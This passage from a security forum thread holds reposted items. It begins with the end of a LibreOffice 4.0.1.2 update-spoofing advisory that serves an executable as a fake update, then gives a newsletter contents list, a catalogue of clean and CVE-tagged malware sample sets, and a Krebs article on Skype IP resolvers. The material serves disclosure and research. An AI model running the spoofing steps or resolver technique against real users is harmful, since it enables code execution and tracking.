src="http://localhost/notepad.exe" /> </inst:description>'; ?> 3. Place "notepad.exe" file to the webserver main directory. 4. Open LibreOffice Writer -> Help -> Check For Updates Response: LibreOffice 5.6.7 is available. 5. Press "Download" button. Successful download ends with response: Download of LibreOffice 5.6.7 completed. Ready for installation. 6. Press "Install" button, choose "Yes" and after that Notepad will be opened. Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------ Sursa: LibreOffice 4.0.1.2 Update Spoofing ? Packet Storm
  23. Nytro
    [h=2]NT Insider 2013[/h]NT Insider 2013 is Out // In this issue of The NT Insider... // switch(IoControlCode) { case IOCTL_TNTI_MSB101: { // Understanding MSBuild project files isn't magic. At least, // not after we explain them to you. // __analysis_assume(NTDDI_VERSION >= NTDDI_WIN8) MSBUILD 101 (Page 4) break; } case IOCTL_TNTI_IRWSL: { // Reader/Writer Spin Locks have been in Windows since // Vista SP1. Finally, they're documented. // Introducing Reader/Writer Spin Locks (Page 6) break; } case IOCTL_TNTI_UMKM: { // Devs always ask: "How can I call a user-mode function // from my driver." You can't. But you don't need to. // Calling User Mode Functions from Kernel Mode (Page 8) break; } case IOCTL_TNTI_FBDE: { // Ever find a missing symbol in the Windows PDBs, or wish // you could fix a symbol error? We tell you how. // Fixing Broken Debugger Extensions (Page 10) break; } case IOCTL_TNTI_ALAL: { // Pre-Fast + SDV = not enough? // Another Look at Lint (Page 12) break; } case IOCTL_TNTI_PP: { // Peter Pontificates (Page 3) break; } default: http://www.osr.com break; } Download: http://insider.osr.com/2013/ntinsider_2013_01.pdf
  24. Nytro
    [h=3]16,800 clean and 11,960 malicious files for signature testing and research.[/h]Sunday, March 24, 2013 Signature and security product testing often requires large numbers of sorted malicious and clean files to eliminate false positives and negatives. They are not always easy to find, but here are some that I have. Clean documents are collected from various open sources. All the copyright rights belong the the authors of each document and file. You must not use the documents for their content but only as samples of particular file types. Download all All files use the same password (scheme). Email me if you need the password. 16,800 CLEAN FILES EXE UTILITY FOR CLEAN EXE FILES XLS(X), DOC(X), RTF CLEAN MS OFFICE FILES AND RTF - 2000 FILES ZIP, 7Z, RAR CLEAN ARCHIVE FILES - 5500 FILES JAR CLEAN JAVA FILES - 100 FILES PDF PDF - 9000_files and PDF -100+with embed_3d_video_swf_ js MACH-O CLEAN OSX MACH-O FILES - 50 FILES ELF CLEAN ELF LINUX FILES - 50 FILES 11,960 MALICIOUS FILES PDF MALWARE PDF NEW -170 FILESMALWARE PDF PRE_04-2011_10982_files RTF, XLS MALWARE RTF_CVE-2010-3333_RTF_92files MALWARE_RTF_CVE-2012-0158_300_files MALWARE_ENCRYPTED_XLS_16files MACH-O MALWARE_MACHO_OSX_100_FILES ELF MALWARE_ELF_LINUX_100_FILES JAR MALWARE JAVA (JAR) - 200 FILES DETAILED LISTING OF CLEAN FILES 1. WINDOWS EXECUTABLES EXE Windows executables. I am not posting any because you can quickly generate your own from any vm. See exe collect utility by Stephan Chenette. https://github.com/IOActive/SearchAndCollect 2. CLEAN MS OFFICE FILES AND RTF - 2,000 FILES DOC, DOCX, XLS, XLSX, RTF RTF - 200_files XLSX -100_files XLS_300_files DOCX_100_files DOC_1300_files 3. CLEAN ARCHIVE FILES - 5,500 FILES 7z, ZIP, RAR Encrypted and not. 7z_w_EXE+DLL_1000_files_nopass RAR_EXE+DLL_1000_files_encryptedname_pass_123qwe RAR_EXE+DLL_1000_files_pass_password123 RAR_OFFICE+PDF_500_files_pass_1234!@#$ ZIP_w_EXE+DLL_1000_files_nopass ZIP_w_EXE+DLL_1000_files_pass_password123 4. CLEAN JAVA FILES - 100 FILES JAR CLEAN_JAR_100_files 5. CLEAN ADOBE READER FILES - 9,100 FILES PDF PDF - 9000_files PDF -100+__embed_3d_video_swf_ js - clean pdf documents with special features - embedded javascript, 3d objects, flash, video, etc. 6. CLEAN OSX MACH-O FILES - 50 FILES 7. CLEAN ELF LINUX FILES - 50 FILES DETAILED LISTING OF MALICIOUS FILES 1. MALWARE ADOBE READER FILES -11,152 FILES PDF PDF-XDP _3files CVE-2013-0640_PDF_21files CVE-2012-0754_PDF_1file CVE-2011-2462_PDF_25files CVE-2010-0188_PDF_49files CVE_2010-2883_PDF_25files MALWARE_PDF_PRE_04-2011_10982_files - files from web exploit packs - older than April 2011. 2. MALWARE MS OFFICE AND RTF FILES - RTF, XLS MALWARE RTF_CVE-2010-3333_RTF_92files MALWARE_RTF_CVE-2012-0158_300_files MALWARE_ENCRYPTED_XLS_16files 3. MALWARE_MACHO_OSX_100_FILES 4. MALWARE_ELF_LINUX_100_FILES 5. MALWARE JAVA (JAR) - 200 FILES Sursa: contagio: 16,800 clean and 11,960 malicious files for signature testing and research.
  25. Nytro
    [h=2]Privacy 101: Skype Leaks Your Location[/h]The events of the past week reminded me of a privacy topic I’ve been meaning to revisit: That voice-over-IP telephony service Skype constantly exposes your Internet address to the entire world, and that there are now numerous free and commercial tools that can be used to link Skype user account names to numeric Internet addresses. The fact that Skype betrays its users’ online location information is hardly news. For example, The Wall Street Journal and other news outlets warned last year about research showing that it was possible to coax Skype into revealing the IP addresses of individual Skype users. But I believe most Skype users still have no clue about this basic privacy weakness. What’s changed is that over the past year, a number of services have emerged to help snoops and ne’er-do-wells exploit this vulnerability to track and harass others online. For example, an online search for “skype resolver” returns dozens of results that point to services (of variable reliability) that allow users to look up the Internet address of any Skype user, just by supplying the target’s Skype account name. In the above screen shot, we can see one such service being used to display the IP address most recently used by the Skype account “mailen_support” (this particular account belongs to the tech support contact for Mailien, a Russian pharmacy spam affiliate program by the same name). Typically, these Skype resolvers are offered in tandem with “booter” or “stresser” services, online attack tools-for-hire than can be rented to launch denial-of-service attacks (one of these services was used in an attack on this Web site, and on that of Ars Technica last week). The idea being that if you want to knock someone offline but you don’t know their Internet address, you can simply search on Skype to see if they have an account, and then use the resolvers to locate their IP. The resolvers work regardless of any privacy settings the target user may have selected within the Skype program’s configuration panel. Many of these resolver services offer “blacklisting,” which for a fee will allow users to prevent other users from looking up the IP address attached to a specific Skype account, said Brandon Levene, an independent security researcher. “It’s basically a protection scheme,” Levene said. Levene said the Skype resolvers work by using a modified Skype client (5.5 or 5.9) to create a debug log. This client is hosted on a web server. “A simple script is used to construct a link containing a Skype username, which is passed to the modified client,” Levene said. “This client simply attempts to add the requested username to a contact list and parses the target account’s ‘information card’ (if available). This process writes the IP address of the requested username to the debug log, in plain sight.” Beyond exposing one’s Internet connection to annoying and disruptive attacks, this vulnerability could allow stalkers or corporate rivals to track the movement of individuals and executives as they travel between cities and states. Skype was purchased by Microsoft in 2011, but Microsoft appears to have done little to address this privacy weakness, despite the attention brought to it and the proliferation of sites offering tools to exploit it. “We are investigating reports of tools that capture a Skype user’s last known IP address,” a spokesperson for Skype said in an emailed statement. “This is an ongoing, industry-wide issue faced by all peer-to-peer software companies.” The simplest way to address these privacy issues would be to relay all Skype signalling traffic (e.g., handshakes) through proxies, said Stevens Le Blond, a researcher at the Max Planck Institute for Software Systems in Germany. “That would prevent low-resource third parties, such as resolvers, to track Skype users,” Le Blond wrote in an email to KrebsOnSecurity. “However, despite a major infrastructure upgrade last year, Skype is still vulnerable to location tracking. One can only hypothesize as to why that is the case. One possibility is that relaying all signalling traffic would break interoperability with earlier versions of Skype. Defending against more powerful attackers able to eavesdrop on Internet links is much more challenging because it requires to relay both signalling and encrypted payload traffic, Le Blond said. “One challenge is that the maximum Round Trip Time (RTT) that VoIP users can tolerate is around 300 milliseconds (ms) whereas the propagation delay in a fiber optical cable spanning the circumference of the planet is approximately 200ms. It means that when a user in Germany calls another one in Australia, the proxy service must incur less than 100ms additional RTT. My team and I are currently working on this problem.” Update, March 22, 9:45 a.m. ET: Added quotes from Microsoft, Levene and Le Blond. Sursa: Privacy 101: Skype Leaks Your Location — Krebs on Security
×
×
  • Create New...